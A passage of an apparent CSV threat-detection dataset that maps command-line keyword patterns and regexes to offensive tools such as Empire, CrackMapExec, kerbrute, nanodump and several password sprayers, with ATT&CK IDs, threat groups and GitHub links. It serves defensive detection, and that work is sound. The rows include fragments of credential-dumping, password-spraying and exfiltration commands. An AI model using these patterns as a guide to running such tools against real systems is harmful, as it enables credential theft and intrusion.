tools","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","3","226","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "* --url --password SIMPLEPASS*",".{0,1000}\s\-\-url\s\-\-password\sSIMPLEPASS.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "* -urlcache */debase64/*",".{0,1000}\s\-urlcache\s.{0,1000}\/debase64\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* url-snarf.nse*",".{0,1000}\surl\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Use-DarkHotel*",".{0,1000}\sUse\-DarkHotel.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -user * --passwordlist *",".{0,1000}\s\-user\s.{0,1000}\s\-\-passwordlist\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "* --user 'nemesis:*",".{0,1000}\s\-\-user\s\'nemesis\:.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* user_persistence_run.c*",".{0,1000}\suser_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "* 
--user-as-pass*",".{0,1000}\s\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* userenum * --dc *",".{0,1000}\suserenum\s.{0,1000}\s\-\-dc\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* userenum -d * *.txt*",".{0,1000}\suserenum\s\-d\s.{0,1000}\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* --UserEnum --Host *",".{0,1000}\s\-\-UserEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* -UserList * -Domain * -PasswordList * -OutFile *",".{0,1000}\s\-UserList\s.{0,1000}\s\-Domain\s.{0,1000}\s\-PasswordList\s.{0,1000}\s\-OutFile\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "* -Username * -Hash * -Command *",".{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Username * -Password * -Command * -LogonType 
*",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Command\s.{0,1000}\s\-LogonType\s.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* --UserName * --Password * --Payload *.exe*",".{0,1000}\s\-\-UserName\s.{0,1000}\s\-\-Password\s.{0,1000}\s\-\-Payload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "* -Username * -Password * -Recon -IncludeADFS*",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Recon\s\-IncludeADFS.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","0","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "* -userpassfile ./userpass_file.txt*",".{0,1000}\s\-userpassfile\s\.\/userpass_file\.txt.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "* -UserPersistenceOption 
*",".{0,1000}\s\-UserPersistenceOption\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --user-spns*",".{0,1000}\s\-\-user\-spns.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","AD 
Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* Use-Waitfor.exe*",".{0,1000}\sUse\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "* utils.ntlmdecode *",".{0,1000}\sutils\.ntlmdecode\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* UUID_bypass.py*",".{0,1000}\sUUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "* vaporizer.py *",".{0,1000}\svaporizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* -VaultElementPtr *",".{0,1000}\s\-VaultElementPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* vaults /target:* /pvk:*",".{0,1000}\svaults\s\/target\:.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* ventrilo-info.nse*",".{0,1000}\sventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* versant-info.nse*",".{0,1000}\sversant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*----- VIRTUALALLOC HOOK -----*",".{0,1000}\-\-\-\-\-\sVIRTUALALLOC\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "* vmauthd-brute.nse*",".{0,1000}\svmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vmware-version.nse*",".{0,1000}\svmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vnc-brute.nse*",".{0,1000}\svnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vnc-info.nse*",".{0,1000}\svnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vnc-title.nse*",".{0,1000}\svnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* voldemort-info.nse*",".{0,1000}\svoldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Volumiser.exe *",".{0,1000}\sVolumiser\.exe\s.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "* vtam-enum.nse*",".{0,1000}\svtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -vulnerable -stdout -hide-admins*",".{0,1000}\s\-vulnerable\s\-stdout\s\-hide\-admins.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* vulners.nse*",".{0,1000}\svulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* vulscan.nse*",".{0,1000}\svulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* vuze-dht-info.nse*",".{0,1000}\svuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -w wordlist/*.txt*http*",".{0,1000}\s\-w\swordlist\/.{0,1000}\.txt.{0,1000}http.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* Waitfor-Persistence.ps1*",".{0,1000}\sWaitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - 
TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "* -watson -Command *",".{0,1000}\s\-watson\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* wcreddump (windows credentials dump)*",".{0,1000}\swcreddump\s\(windows\scredentials\sdump\).{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* wcreddump.py*",".{0,1000}\swcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* wdb-version.nse*",".{0,1000}\swdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --wdigest disable*",".{0,1000}\s\-\-wdigest\sdisable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --wdigest enable*",".{0,1000}\s\-\-wdigest\senable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* web-hacking-toolkit *",".{0,1000}\sweb\-hacking\-toolkit\s.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","2","156","30","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "* weblogic-t3-info.nse*",".{0,1000}\sweblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --werfault *\temp\*",".{0,1000}\s\-\-werfault\s.{0,1000}\\temp\\.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* wget ""https://*/interactshbuild*",".{0,1000}\swget\s\""https\:\/\/.{0,1000}\/interactshbuild.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* whoami > zzz.txt*",".{0,1000}\swhoami\s\>\szzz\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 